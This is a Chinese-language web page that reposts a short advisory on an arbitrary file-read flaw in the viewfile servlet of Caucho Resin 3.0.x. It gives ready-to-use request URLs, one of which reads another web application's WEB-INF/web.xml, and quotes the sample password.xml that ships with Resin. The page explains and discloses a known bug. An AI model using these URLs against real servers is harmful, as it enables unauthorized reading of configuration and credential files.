网站地图    收藏   

子栏目

主页 > 入门引导 > 黑客攻防 >

Resin viewfile远程文件读取 - 网站安全 - 自学php

来源:自学PHP网    时间:2015-04-15 14:59 作者: 阅读:

[导读] Finger (Save water Shower with your girlfriend ) | 2014-01-13 12:04受影响系统:Caucho Technology Resin v3 0 18Caucho Technology Resin v3 0 17Caucho Technology Resin v3 0 16Cauch...

Finger (Save water. Shower with your girlfriend.) | 2014-01-13 12:04
 
受影响系统:
 
Caucho Technology Resin v3.0.18
 Caucho Technology Resin v3.0.17
 Caucho Technology Resin v3.0.16
 Caucho Technology Resin v3.0.15
 Caucho Technology Resin v3.0.14
 Caucho Technology Resin v3.0.13
 Caucho Technology Resin v3.0.12
 Caucho Technology Resin v3.0.11
 Caucho Technology Resin v3.0.10
默认下Resin的/webapps目录下/resin-doc中包含有一个扩展war文件。该文档包含有用于在集成的手册中浏览文件的servlet:
 
 
http://localhost/resin-doc/viewfile/?contextpath=%2Fresin-doc%2Fjmx%2Ftutorial%2Fbasic&servletpath=%2Findex.xtp&file=index.jsp&re-marker=&re-start=&re-end=#code-highlight

viewfile servlet

 

 
 
可以无需参数在Web主目录中浏览任意文件:
 
 
http://localhost/resin-doc/viewfile/?file=index.jsp
 
 
请注意这句话:
 
攻击者可以设置resin-doc外的上下文路径,读取其他Web主目录的任意文件:
 
 
 
http://localhost/resin-doc/viewfile/?contextpath=/otherwebapp&servletpath=&file=WEB-INF/web.xml
 
 
描器扫出来的这些,证明不了什么
 
 
 
http://localhost/resin-doc/examples/security-basic/viewfile?file=WEB-INF/web.xml
 
 
http://localhost/resin-doc/examples/security-basic/viewfile?file=password.xml
 
examples = 例子
 
 
有人可能会觉得读出password.xml了,是敏感信息,下面是我刚下载的resin内resin-doc\examples\security-basic\WEB-INF\password.xml文件的内容,可以和大家读到的对比下。
 
这个文件只是examples!
 
 
<!-- password.xml -->
<authenticator>
    <!-- professors -->
    <user name='snape' password='I7HdZr7CTM6hZLlSd2o+CA==' roles='professor,slytherin'/>
    <user name='mcgonagall' password='4slsTREVeTo0sv5hGkZWag==' roles='professor,gryffindor'/>
    <!-- students -->
    <user name='harry' password='uTOZTGaB6pooMDvqvl2Lbg==' roles='student,gryffindor'/>
    <user name='dmalfoy' password='yI2uN1l97Rv5E6mdRnDFwQ==' roles='student,slytherin'/>
    <!-- alumni -->
    <user name='lmalfoy' password='sj/yhtU1h4LZPw7/Uy9IVA==' roles='alumni,gryffindor'/>
</authenticator>

 

 
 

最新评论

    加载更多~~

    添加评论

    更多文章推荐

    自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

    京ICP备14009008号-1@版权所有www.zixuephp.com

    网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

    添加评论